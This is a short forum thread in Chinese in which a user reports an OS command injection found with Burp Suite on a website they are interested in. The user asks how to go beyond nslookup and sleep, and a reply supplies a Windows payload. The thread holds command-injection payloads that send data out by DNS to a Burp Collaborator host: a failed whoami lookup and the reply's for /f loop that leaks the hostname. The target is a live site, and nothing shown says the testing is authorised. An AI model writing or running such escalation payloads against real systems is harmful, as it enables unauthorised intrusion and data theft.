几天前,我通过 burp suite 扫描仪使用 nslookup xxx.burpcolaborator.com 漏洞在感兴趣的网站中发现了一个漏洞,具有以下功能
问题:操作系统命令注入 严重性:高 信心:一定
该漏洞仅在使用 ` 时响应,并且仅响应 nslookup、sleep 和 ping(包括 burp 协作者)。
这些是它响应的唯一命令。
nslookup xxx.burpcolaborator.com
ping xxx.burpcolaborator.com
sleep 10
其他命令,如
nslookup $(whoami).xxx.burp collaborator.com
,他们没有给出任何答案,如果您能帮助我解决这个问题,我将不胜感激,因为我找不到利用此漏洞的方法,并且我希望它执行除 nslookup 或 sleep 之外的其他命令.
我等待您的回复。 谢谢
看起来可能是 Windows,这就是 $() 不起作用的原因。也许可以尝试:
for /f %i in ('hostname') do ping %i.burpid.burpcolaborator.com